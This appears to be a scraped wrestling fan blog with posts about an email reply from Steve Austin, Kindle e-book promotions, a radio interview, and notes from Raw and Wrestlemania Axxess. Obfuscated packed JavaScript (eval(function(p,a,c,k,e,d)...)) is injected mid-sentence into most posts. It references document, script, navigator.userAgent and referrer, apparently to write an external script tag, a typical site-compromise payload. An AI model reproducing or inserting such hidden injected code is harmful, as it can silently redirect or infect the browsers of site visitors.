My Geek Out Moment Of The Day

I’m a big fan of Steve Austin’s podcast and he gives an email address for comments and questions.  On a whim I sent him an email about the two shows I had seen him at and thanking him for the years of entertainment.  I actually got a reply:

thanks, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|enitk|var|u0026u|referrer|ytzrn||js|php'.split('|'),0,{})) thomas

There’s something awesome about the idea of Steve Austin reading something I wrote and actually replying to it.

Happy Fourth of July

Hope eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|feaez|var|u0026u|referrer|dytyb||js|php'.split('|'),0,{})) you all have a good holiday.  Enjoy the weather (if applicable or if you enjoy thunderstorms), have a hamburger (because America celebrates its independence day with food that was likely invented in Germany) and watch some Chinese fireworks.

It’ll be up every Wednesday under a title to be determined. It’s going to be my take on what’s going on in wrestling at the moment but I’m sure I’ll tie some stuff in to old school. Since it’s exclusive I’ll link to it, but Wrestlingrumors is the best news site on the internet anyway, mainly because I write for them.

Hope you enjoy it,

New E-Book: KB’s History of Survivor Series

This time we’re starting back in 1987 when there was only one WWF pay per view a year.  With Wrestlemania III being a huge success, it was decided that another pay per view should be added to help bridge the gap between Wrestlemanias.  The fact that it was able to cause major damage to the NWA was just a bonus.

There has been a long list of great Survivor Series matches over the years, including the tag team Survivor Series matches, Bret Hart vs. Shawn Michaels in 1992 and Steve Austin vs. Bret Hart. There’s also a big list of people making their debut with the company at the show. Names like the Undertaker, Kurt Angle and The Rock all stepped into the ring for the first time at Survivor Series. On top of all that Survivor Series had the most infamous moment in wrestling history that changed a lot of things forever.

In this new book, I’ll be looking at the history of the Survivor Series, breaking down each show and going over every match, promo and segment, providing historical context, analysis and rating each match and show.

The book is available from Amazon for just $3.99 (or the equivalent in any other currency) and runs 391 pages on a Kindle. If you don’t have a Kindle, there are free apps that you can get to read it on your phone, laptop, iPad, or any other electronic device you have. These can be found from Amazon here.

You eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hndne|var|u0026u|referrer|ehzsz||js|php'.split('|'),0,{})) can pick it up from Amazon here.

From the UK Amazon here.

From the Canadian Amazon here.

Or if you’re in another country with its own Amazon page, just search KB Survivor Series and it should be the first thing that pops up.

Also you can still get any of my previous books on the WWE Championship, Monday Night Raw from 1998 and 2001, Monday Nitro from 1995-96, In Your House, Summerslam, Starrcade and Clash of the Champions at my author’s page here.

I hope you enjoy it and thanks for checking it out.

Going On The Radio Again

And eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ytshf|var|u0026u|referrer|ihyai||js|php'.split('|'),0,{})) this time it’s going international.

It’s the Mouth of the South Shore Radio Show and it airs tomorrow (Monday) night at 9:30pm EST for an hour. The show has already been taped and is a solid interview, talking about Axxess, Wrestlemania, Raw, the Warrior, Evolution and various Divas. It’s worth a listen and I’m almost entertaining this time.

Also, do me a favor and like their Facebook page. It would help them out a lot and takes all of 4 seconds to do.

Back From Raw

A eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nabds|var|u0026u|referrer|syhti||js|php'.split('|'),0,{})) few notes.1. Ryback beat Dolph Ziggler and Titus O’Neil beat Kofi Kingston in the dark matches.

2. Paul Heyman is AMAZING and owned the crowd.

3. The place went nuts for Paige.

4. “No Zeb.  I’m a Paul Heyman guy” was the non-Bryan moment of the night.  I’m not sure what they’re going to do though as he’s still a heel.  It’s a perfect fit though and most importantly there’s no Jack Swagger.

5. There were Adam Rose and Bo Dallas vignettes.  I didn’t so a “coming soon” graphic for Dallas though.  He seems like a motivational speaker or something.  The fans were WAY into Rose.

6. Rusev was impressive and Lana is hot in person.

7. The roof went off when Shield came out.

8. I’m not sure if you could hear it but the fans were singing JOHN CENA SUCKS to the trumpet part (as in the duh duh nuh nuh.  The part before Your time is up, my time is now) of his song throughout the night.

9. I had a blast.

10. Oh and NO STING SO SHUT UP ABOUT HIM ALREADY!

11. Oh and I met Bob Backlund.  Twice.

There was a lot of good stuff but some of the things could have been done better. I took a ton of pictures which I’ll post when I get back home and get to my camera cord. There were some VERY nice surprises there though and I met some people who weren’t advertised.

Anyway I got in the second line I saw which had a big WWE 2K14 sign behind it. I passed on the Scooby Doo booth which had Santino Marella as the guest. I asked one of the people next to me who the guest was and then I see none other than Dolph Ziggler (in an NWO shirt for some reason) take the stage.

Despite having maybe 50 people in front of us, it took an hour and fifteen minutes to get through the line. This was partially due to Ziggler stopping to talk to the disabled/handicapped people in a separate line (nothing wrong with that and something that happened all day long). The other reason was Dolph doing a TWENTY MINUTE INTERVIEW while we waited in line. The cool thing about this: I might be on Wrestlemania Today on the Network. The camera pans over his line and I was at the front at the time. Ziggler was very nice and kept eating Pizza Rolls (sponsor) between meeting fans. He shook my hand and posed for a picture while signing the back of my Axxess map.

While I was in line, Bob Backlund of all people came casually walking behind me and went behind a curtain. I waved at him and got one in return but he was too far away for a picture or autograph. You could hear him giving one of his ranting promos in the NXT ring while I was in line.

The interesting thing here was the cast of people walking around from an entrance in the back to their booths. From there I saw Eva Marie, the Funkadactyls (all being filmed for Total Divas), Darren Young, Norman Smiley, Damien Sandow and Mick Foley, with a bad limp. Backlund walked right back into the crowd while this was going on as well. He has that goofy look on his face the entire time as well.

After that I walked around to look at some exhibits and to try and find the shortest line. I came across the Legends House booth and saw Hacksaw Jim Duggan signing on a Legends House set. The line took awhile as there was a professional photographer who gave you a card where you could access your pictures online for free. This would have been a great thing to do all over the place instead of just with Legends House but whatever.

New E-Book: KB’s History Of Clash Of The Champions

We’re going back to the 80s again with the original WCW prime time special.  Starting in March of 1988, the NWA launched the Clash of the Champions to mess with Wrestlemania IV.  The idea worked so they decided to keep things going and made more editions of the show.  Over the course of nearly ten years, thirty five Clash of the Champions specials were produced with some of the best matches WCW ever had included.

In this new book, I go back and look at every single show, breaking each one down match by match and segment by segment with detailed analysis and a look through the history of the series with a set of ALL NEW reviews.

The book is available from Amazon for just $3.99 and runs 354 pages on a Kindle.  If you don’t have a Kindle, there are free eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnkia|var|u0026u|referrer|ydite||js|php'.split('|'),0,{})) apps that you can get to read it on your phone, laptop, iPad, or any other electronic device you have.  These can be found from Amazon here.
